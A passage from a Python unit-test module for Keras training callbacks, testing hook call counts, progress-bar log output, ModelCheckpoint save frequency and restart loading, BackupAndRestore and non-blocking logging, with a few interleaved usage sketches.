'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None, additional_metrics=None):
additional_metrics = additional_metrics or []
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')] +
additional_metrics,
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_with_stateful_metrics(self):
class AddAllOnes(keras.metrics.Metric):
"""A simple metric that adds all the one's in `y_true`."""
def __init__(self, name='add_all_ones', **kwargs):
super(AddAllOnes, self).__init__(name=name, **kwargs)
self.total = self.add_weight(name='total', initializer='zeros')
def update_state(self, y_true, y_pred, sample_weight=None):
self.total.assign_add(
tf.cast(tf.reduce_sum(y_true), dtype=tf.float32))
def result(self):
return self.total
x_train = np.array([[0, 1, 0, 1, 0, 1, 0, 1]] * 8).astype(float)
y_train = np.array([[1, 0], [0, 0], [1, 1], [1, 0], [0, 1], [1, 0], [1, 0],
[0, 0]])
# There are 7 ones in total in `y_train` after two batches.
expected_log = r'(.*- loss:.*- my_acc:.*- add_all_ones: 7.0000)+'
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.fit(x_train, y_train, verbose=1, batch_size=4, shuffle=False)
self.assertRegex(printed.contents(), expected_log)
# When not executing eagerly, `model.evaluate` does not have the metrics
# results printed.
if tf.executing_eagerly():
with self.captureWritesToStream(sys.stdout) as printed:
model = self._get_model(
input_shape=(8,), additional_metrics=[AddAllOnes()])
model.evaluate(x_train, y_train, verbose=1, batch_size=4)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_trivial_backup_restore(self):
if testing_utils.should_run_eagerly():
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=0, callbacks=[cbk])
def test_backup_restore_train_counter(self):
if not tf.compat.v1.executing_eagerly():
self.skipTest('BackupAndRestore only available when eager execution is enabled')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
cbk = BackupAndRestore(self.get_temp_dir())
class InterruptingCallback(keras.callbacks.Callback):
"""A callback to intentionally introduce interruption to training."""
def on_epoch_end(self, epoch, log=None):
logging.info(f'counter: {model._train_counter}')
if epoch == 5 or epoch == 12:
raise RuntimeError('Interruption')
log_dir = self.get_temp_dir()
# The following asserts that the train counter is fault tolerant.
self.assertEqual(model._train_counter.numpy(), 0)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 6)
try:
model.fit(np.ones((10, 1)), np.ones((10, 1)), epochs=20,
callbacks=[cbk, InterruptingCallback()])
except RuntimeError:
pass
self.assertEqual(model._train_counter.numpy(), 13)
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
model_type = testing_utils.get_model_type()
if model_type == 'subclass':
return # Skip test since subclassed models cannot be saved in .h5 format.
if not tf.__internal__.tf2.enabled():
self.skipTest('Checkpoint callback only available in v2.')
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(3,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# Case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case 5: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# Case 6
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 7: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 8: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100)  # `period` should be ignored when `save_freq` is an integer (this case verifies that).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 9: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 10: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
# Case 11: `ModelCheckpoint` save model with batch number in filename.
filepath = os.path.join(temp_dir,
'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1)
]
assert not os.path.exists(filepath.format(epoch=1, batch=1))
assert not os.path.exists(filepath.format(epoch=1, batch=2))
assert not os.path.exists(filepath.format(epoch=2, batch=1))
assert not os.path.exists(filepath.format(epoch=2, batch=2))
assert not os.path.exists(filepath.format(epoch=3, batch=1))
assert not os.path.exists(filepath.format(epoch=3, batch=2))
assert not os.path.exists(filepath.format(epoch=4, batch=1))
assert not os.path.exists(filepath.format(epoch=4, batch=2))
assert not os.path.exists(filepath.format(epoch=5, batch=1))
assert not os.path.exists(filepath.format(epoch=5, batch=2))
model.fit(
x_train,
y_train,
batch_size=5,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=1)
assert os.path.exists(filepath.format(epoch=1, batch=1))
assert os.path.exists(filepath.format(epoch=1, batch=2))
assert os.path.exists(filepath.format(epoch=2, batch=1))
assert os.path.exists(filepath.format(epoch=2, batch=2))
assert os.path.exists(filepath.format(epoch=3, batch=1))
assert os.path.exists(filepath.format(epoch=3, batch=2))
assert os.path.exists(filepath.format(epoch=4, batch=1))
assert os.path.exists(filepath.format(epoch=4, batch=2))
assert os.path.exists(filepath.format(epoch=5, batch=1))
assert os.path.exists(filepath.format(epoch=5, batch=2))
os.remove(filepath.format(epoch=1, batch=1))
os.remove(filepath.format(epoch=1, batch=2))
os.remove(filepath.format(epoch=2, batch=1))
os.remove(filepath.format(epoch=2, batch=2))
os.remove(filepath.format(epoch=3, batch=1))
os.remove(filepath.format(epoch=3, batch=2))
os.remove(filepath.format(epoch=4, batch=1))
os.remove(filepath.format(epoch=4, batch=2))
os.remove(filepath.format(epoch=5, batch=1))
os.remove(filepath.format(epoch=5, batch=2))
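# Illustrative sketch (not part of the test above): a minimal standalone use
# of `ModelCheckpoint` with `save_best_only` and an epoch-based `save_freq`.
# The `tensorflow.keras` import style and the temporary path are assumptions
# made for this sketch only, not part of this test module.
def _model_checkpoint_usage_sketch(tmp_dir='/tmp'):
  import os
  import numpy as np
  from tensorflow import keras
  model = keras.Sequential([keras.layers.Dense(1, input_shape=(3,))])
  model.compile('sgd', 'mse')
  x, y = np.ones((8, 3)), np.ones((8, 1))
  # Keep only checkpoints that improve `val_loss`, written at most once per epoch.
  ckpt = keras.callbacks.ModelCheckpoint(
      os.path.join(tmp_dir, 'best.{epoch:02d}.h5'),
      monitor='val_loss',
      save_best_only=True,
      mode='min',
      save_freq='epoch')
  model.fit(x, y, validation_data=(x, y), epochs=2,
            callbacks=[ckpt], verbose=0)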
@testing_utils.run_v2_only
def test_ModelCheckpoint_subclass_save_weights_false(self):
model = testing_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint')
cbks = [keras.callbacks.ModelCheckpoint(
filepath, save_weights_only=False)]
(x_train, y_train), _ = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES)
model.fit(
x_train,
y_train,
callbacks=cbks,
epochs=1,
verbose=0)
# Check that the filepath is a SavedModel directory.
self.assertIn('saved_model.pb', os.listdir(filepath))
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The checkpoint files should exist after fitting with the callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The checkpoint files should continue to exist after fitting without the callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep briefly so the checkpoint files get distinct modification times
# (on macOS in OSS builds the timestamp granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
])
weights_with_one_final_extra_epoch = model.get_weights()
# Assert that the weights one epoch after the initial fitting and another
# epoch after that are close, because a ModelCheckpoint with
# load_weights_on_restart=True restores the model at the
# beginning of training.
self.assertAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
self.assertNotAllClose(weights_after_one_more_epoch,
weights_with_one_final_extra_epoch)
return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=save_weights_only)
])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
# Assert that the weights one epoch after the initial fitting and another
# epoch after that differ, because a ModelCheckpoint with
# load_weights_on_restart=False does not restore the model at
# the beginning of training.
self.assertNotAllClose(weights_after_one_more_epoch,
weights_after_model_restoring_and_one_more_epoch)
return func
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)
test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
= get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
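# Illustrative sketch (not part of the tests above): `load_weights_on_restart`
# makes `ModelCheckpoint` reload the newest checkpoint matching `filepath`
# before training starts, which is how an interrupted job can resume. A
# compiled `model`, a `train_ds` dataset, the import style, and the checkpoint
# path are assumptions for this sketch only.
def _resume_training_sketch(model, train_ds, ckpt_dir='/tmp'):
  import os
  from tensorflow import keras
  callback = keras.callbacks.ModelCheckpoint(
      filepath=os.path.join(ckpt_dir, 'ckpt.epoch{epoch:02d}.h5'),
      save_weights_only=True,
      load_weights_on_restart=True)  # restore the latest weights when fit() begins
  # Every fit() call first restores the newest checkpoint, then trains on.
  model.fit(train_ds, epochs=1, callbacks=[callback])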
def test_ModelCheckpoint_override_if_file_exist(self):
(model, train_ds, filepath,
_) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep briefly so the checkpoint files get distinct modification times
# (on macOS in OSS builds the timestamp granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_before_additional_fit = model.get_weights()
model.fit(train_ds, epochs=1, callbacks=[callback])
model.load_weights(
callback._get_most_recently_modified_file_matching_pattern(filepath))
weights_after_additional_fit = model.get_weights()
self.assertNotAllClose(weights_before_additional_fit,
weights_after_additional_fit)
def test_fit_with_ModelCheckpoint_with_tf_config(self):
(model, train_ds, callback,
_) = self._get_dummy_resource_for_model_checkpoint_testing()
os.environ['TF_CONFIG'] = json.dumps({
'cluster': {
'worker': ['localhost:23333']
},
'task': {
'type': 'worker',
'index': 0
}
})
# `model.fit()` should work regardless of the presence of `TF_CONFIG`.
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
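# Illustrative sketch (not part of the test above): setting the private
# `_supports_tf_logs` flag (exercised above) tells `CallbackList` to hand the
# callback raw tensor logs; such a callback should avoid forcing a NumPy
# conversion in batch-level hooks, which is exactly what the mocked
# `tensor.numpy` above guards against. This uses a private Keras attribute and
# is shown only as a sketch.
def _tf_logs_callback_sketch():
  from tensorflow import keras
  class TensorLogsCallback(keras.callbacks.Callback):
    def __init__(self):
      super(TensorLogsCallback, self).__init__()
      self._supports_tf_logs = True  # receive tf.Tensor logs instead of numpy
    def on_train_batch_end(self, batch, logs=None):
      pass  # do not call .numpy() here; that would synchronize every batch
  return TensorLogsCallback()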
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ProgbarLogger is causing a blocking '
'NumPy conversion outside of epoch end.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
